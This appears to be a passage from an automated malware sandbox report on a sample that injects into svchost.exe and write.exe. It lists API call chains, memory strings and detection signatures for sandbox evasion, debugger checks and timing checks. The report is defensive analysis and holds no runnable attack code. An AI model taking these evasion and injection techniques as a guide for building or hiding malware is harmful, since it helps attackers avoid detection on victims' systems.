            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fZXsbVktlmkz.exe, 00000005.00000002.3551483374.0000000000B1E000.00000002.00000001.01000000.00000005.sdmp, fZXsbVktlmkz.exe, 00000007.00000000.2163431808.0000000000B1E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: r6lOHDg9N9.exe, 00000000.00000003.1712107540.0000000004730000.00000004.00001000.00020000.00000000.sdmp, r6lOHDg9N9.exe, 00000000.00000003.1713194191.0000000004590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1996951815.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1993960398.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.0000000003200000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553071659.0000000004450000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2093550027.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2095629016.00000000042AA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553071659.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: r6lOHDg9N9.exe, 00000000.00000003.1712107540.0000000004730000.00000004.00001000.00020000.00000000.sdmp, r6lOHDg9N9.exe, 00000000.00000003.1713194191.0000000004590000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1996951815.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1993960398.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2093909663.0000000003200000.00000040.00001000.00020000.00000000.sdmp, write.exe, write.exe, 00000006.00000002.3553071659.0000000004450000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2093550027.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2095629016.00000000042AA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553071659.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 00000006.00000002.3551184016.0000000002865000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553914086.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000000.2163720492.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2383157688.000000002979C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 00000006.00000002.3551184016.0000000002865000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.3553914086.0000000004A7C000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000000.2163720492.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2383157688.000000002979C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: r6lOHDg9N9.exeStatic PE information: real checksum: 0xa2135 should be: 0x149afe
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041897C push 72AC03CBh; iretd 1_2_004189FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004141CC push eax; ret 1_2_004141D5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418983 push 72AC03CBh; iretd 1_2_004189FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403240 push eax; ret 1_2_00403242
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418A03 push 72AC03CBh; iretd 1_2_004189FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417E03 push edx; retf 1_2_00417E06
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413F3D push ecx; iretd 1_2_00413F42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD push ecx; mov dword ptr [esp], ecx1_2_032309B6
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeCode function: 5_2_0284B81D push 72AC03CBh; iretd 5_2_0284B819
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeCode function: 5_2_0284B79D push 72AC03CBh; iretd 5_2_0284B819
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeCode function: 5_2_0284B79A push 72AC03CBh; iretd 5_2_0284B819
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exeCode function: 5_2_0284AC1D push edx; retf 5_2_0284AC20
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044527FA pushad ; ret 6_2_044527F9
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0445225F pushad ; ret 6_2_044527F9
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0445283D push eax; iretd 6_2_04452858
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_044809AD push ecx; mov dword ptr [esp], ecx6_2_044809B6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001DE07C pushfd ; retf 6_2_001DE07D
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001E4BC0 push edx; retf 6_2_001E4BC3
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001EEE50 push ebx; iretd 6_2_001EEEA8
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001E76E0 push edx; ret 6_2_001E7720
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001E5739 push 72AC03CBh; iretd 6_2_001E57BC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001E5740 push 72AC03CBh; iretd 6_2_001E57BC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001E57C0 push 72AC03CBh; iretd 6_2_001E57BC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041F5532 push ds; ret 6_2_041F5534
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041FE7AC push esi; iretd 6_2_041FE7AE
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041FB0AA push ds; retf 6_2_041FB0B7
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_041F281F pusha ; iretd 6_2_041F2826
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Contains functionality to detect sleep reduction / modifications
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_004440780_2_00444078
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeAPI/Special instruction interceptor: Address: 3ECCE6C
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\write.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
            Source: C:\Windows\SysWOW64\write.exeWindow / User API: threadDelayed 9769Jump to behavior
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeAPI coverage: 3.2 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\write.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\write.exe TID: 4048Thread sleep count: 203 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 4048Thread sleep time: -406000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 4048Thread sleep count: 9769 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\write.exe TID: 4048Thread sleep time: -19538000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe TID: 6500Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe TID: 6500Thread sleep time: -34500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\write.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_001EC450 FindFirstFileW,FindNextFileW,FindClose,6_2_001EC450
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
            Source: write.exe, 00000006.00000002.3551184016.0000000002865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
            Source: fZXsbVktlmkz.exe, 00000007.00000002.3551111899.0000000000520000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
            Source: firefox.exe, 00000008.00000002.2384386809.000001862960C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllVV
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004175D3 LdrLoadDll,1_2_004175D3
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_03ECD138 mov eax, dword ptr fs:[00000030h]0_2_03ECD138
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_03ECD0D8 mov eax, dword ptr fs:[00000030h]0_2_03ECD0D8
            Source: C:\Users\user\Desktop\r6lOHDg9N9.exeCode function: 0_2_03ECBA88 mov eax, dword ptr fs:[00000030h]0_2_03ECBA88
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C310 mov ecx, dword ptr fs:[00000030h]1_2_0322C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250310 mov ecx, dword ptr fs:[00000030h]1_2_03250310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D437C mov eax, dword ptr fs:[00000030h]1_2_032D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov ecx, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA352 mov eax, dword ptr fs:[00000030h]1_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D8350 mov ecx, dword ptr fs:[00000030h]1_2_032D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032663FF mov eax, dword ptr fs:[00000030h]1_2_032663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC3CD mov eax, dword ptr fs:[00000030h]1_2_032EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B63C0 mov eax, dword ptr fs:[00000030h]1_2_032B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov ecx, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322823B mov eax, dword ptr fs:[00000030h]1_2_0322823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322826B mov eax, dword ptr fs:[00000030h]1_2_0322826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov eax, dword ptr fs:[00000030h]1_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov ecx, dword ptr fs:[00000030h]1_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A250 mov eax, dword ptr fs:[00000030h]1_2_0322A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236259 mov eax, dword ptr fs:[00000030h]1_2_03236259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov ecx, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
